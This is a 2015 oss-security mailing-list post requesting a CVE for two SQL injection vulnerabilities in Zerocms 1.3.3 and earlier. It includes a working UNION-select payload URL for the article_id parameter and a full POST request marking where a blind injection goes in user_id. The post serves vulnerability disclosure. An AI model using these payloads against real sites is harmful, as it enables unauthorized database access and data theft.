Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 1 Feb 2015 09:15:03 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities

Hi Steve, Josh, vendors, list.

I found two SQL injection vulnerabilities in Zerocms <= v. 1.3.3.

The first SQL injection vulnerability is located in the article_id
parameter used in zero_view_article.php and can be exploited even by
unauthenticated attackers.

See the following exploit-example:

http://
{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+

The second vulnerability is a Blind SQL injection an is located in the
user_id parameter used in a POST request in zero_transact_user.php.

An attacker can exploit this vulnerabilitiy in the administrative backend
via the following POST request exploit-example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=user&email=user%40user.de&access_level=1&user_id=2 {SQL injection goes
here}&action=Modify+Account

Could you please assign a CVE-ID for this?

Thank you very much.

Greetings from Germany.

Steffen Rösemann

References:

[1] http://aas9.in/zerocms/
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
[3] https://github.com/perezkarjee/zerocms/issues/3
[4] https://github.com/sroesemann/zerocms
[5] https://twitter.com/sroesemann/status/559273548691546113
[6]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-14.html
[7] http://seclists.org/fulldisclosure/2015/Feb/4

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.